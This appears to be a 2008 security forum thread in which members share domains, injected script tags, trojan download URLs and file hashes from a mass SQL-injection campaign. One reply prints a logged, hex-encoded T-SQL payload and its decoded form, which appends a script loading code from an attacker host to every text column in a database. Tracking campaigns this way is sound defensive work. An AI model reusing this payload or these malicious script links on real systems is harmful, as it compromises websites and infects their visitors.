Author Topic: SQL Injected jscript sites  (Read 71591 times)

0 Members and 1 Guest are viewing this topic.

July 17, 2008, 09:22:50 pm
Reply #75

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
The Shadowserver Foundation

July 19, 2008, 05:53:55 pm
Reply #76

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

July 21, 2008, 02:16:47 am
Reply #77

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
<script src=hxxp://stoe.co.kr/img/btn/1.js></script>

<script src=hxxp://www.attadd.com/ngg.js></script>
<script src=hxxp://www.brcporb.ru/ngg.js></script>
<script src=hxxp://www.gb53.ru/ngg.js></script>
<script src=hxxp://www.korfd.ru/ngg.js></script>
<script src=hxxp://www.h23f.ru/ngg.js></script>
<script src=hxxp://www.lkc2.ru/ngg.js></script>

July 21, 2008, 04:54:54 pm
Reply #78

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Code: [Select]
<script src="http://1.verynx.cn/w.js"></script>
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

July 21, 2008, 05:11:36 pm
Reply #79

sowhat-x

  • Guest
Quote
hxxp://www.jvke.ru/ngg.js
hxxp://www.ecx2.ru/ngg.js
Pointing to:
hxxp://nudk.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.jex5.ru/ngg.js
Pointing to:
hxxp://gb53.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.5kc3.ru/ngg.js
hxxp://www.4cnw.ru/ngg.js
hxxp://www.keje.ru/ngg.js
hxxp://www.d5sg.ru/ngg.js
hxxp://www.90mc.ru/ngg.js
Pointing to:
hxxp://4cnw.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.btoperc.ru/ngg.js
hxxp://www.grtsel.ru/ngg.js
Pointing to:
hxxp://h23f.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.o1o2qq.cn/ri.js

July 22, 2008, 01:10:32 pm
Reply #80

sowhat-x

  • Guest
Quote
hxxp://www.keec.ru/ngg.js
Pointing to:
hxxp://keje.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.9jsr.ru/ngg.js
Pointing to:
hxxp://5kc3.ru/cgi-bin/index.cgi?ad


July 22, 2008, 03:10:52 pm
Reply #81

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

July 24, 2008, 02:43:17 pm
Reply #82

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
<script src=hxxp://www.4vrs.ru/ngg.js></script>
<script src=hxxp://www.bts5.ru/ngg.js></script>
<script src=hxxp://www.cgt4.ru/ngg.js></script>
<script src=hxxp://www.chds.ru/ngg.js></script>
<script src=hxxp://www.cvsr.ru/ngg.js></script>
<script src=hxxp://www.kgj3.ru/ngg.js></script>
<script src=hxxp://www.lksr.ru/ngg.js></script>
<script src=hxxp://abc.verynx.cn/w.js></script>

July 24, 2008, 03:35:02 pm
Reply #83

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Code: [Select]
<script src="http://abc.verynx.cn/w.js">
<script src="http://1.verynx.cn/w.js">
<script src="http://xunlei.verynx.cn/w.js">

Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

July 26, 2008, 05:45:28 pm
Reply #84

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

August 06, 2008, 06:56:36 pm
Reply #85

sowhat-x

  • Guest
Quote
hxxp://jjmaobuduo.3322.org/csrss/w.js
hxxp://jjmaoduo.3322.org/csrss/w.js
hxxp://www.8hcs.ru/js.js
hxxp://www.98hs.ru/js.js
hxxp://www.bgsr.ru/js.js
hxxp://www.bywd.ru/js.js
hxxp://www.ibse.ru/js.js
hxxp://www.ncbw.ru/js.js
hxxp://www.nwj4.ru/js.js
hxxp://www.ojns.ru/js.js
hxxp://www.porv.ru/js.js
hxxp://www.uhwc.ru/js.js

"Main" malware executable that gets dropped from some of the above...
(MD5 -> 68ba2b52c10841ea3d3e5d0982f647d8):
Quote
hxxp://www.plgou.com/csrss/rondll32.exe
And also...
Quote
hxxp://91.203.93.4/cgi-bin/index.cgi?ad

August 06, 2008, 11:06:15 pm
Reply #86

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132
===
"Main" malware executable that gets dropped from some of the above...
(MD5 -> 68ba2b52c10841ea3d3e5d0982f647d8):
===

fukc... what is it? i've never seen that. Chines baidu.com, .ru sites and rootkits + unreachable admin page on 246.114.180.29:7854.... 
pls add this admin page
Code: [Select]
http://www.plgou.com/csrss/ack.html
and trojans from that
Code: [Select]
http://www.plgou.com/comine/sss.exe
http://www.plgou.com/comine/beauty.exe
http://www.plgou.com/comine/sl.exe
http://www.plgou.com/comine/server.exe

August 06, 2008, 11:34:12 pm
Reply #87

sowhat-x

  • Guest
Regarding the dropped rondll32.exe above...
http://s3cwatch.wordpress.com/2008/08/06/

Didn't really bothered digging more on the dropped exes to be honest,
spent more time trying to dig newer "injection" domains per se...

Edit:Thought i should add the hashes from the rest of .exes as well...
Quote
846790691B6F9717B9A1BF68E0BCD6E5 -> sss.exe
C1D6F2020EA16FA73CF70F522A7ECFD6 -> beauty.exe
82686A1AB42882AE0E40B863E79E6E33  -> sl.exe
526FEEE3909E18DB7D8AA567019B7C2C -> server.exe

August 07, 2008, 11:11:54 am
Reply #88

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
One from todays logs on one of our servers

Log entry, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

Decoded, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

The link is returning a 500 Internal server error.

In all we have seen this same sql injection attempt from 35 indivdual IPs today.
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

August 07, 2008, 02:18:45 pm
Reply #89

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
also downloaded.

Quote
hxxp://www.plgou.com/comine/new2.exe
hxxp://www.plgou.com/comine/b.exe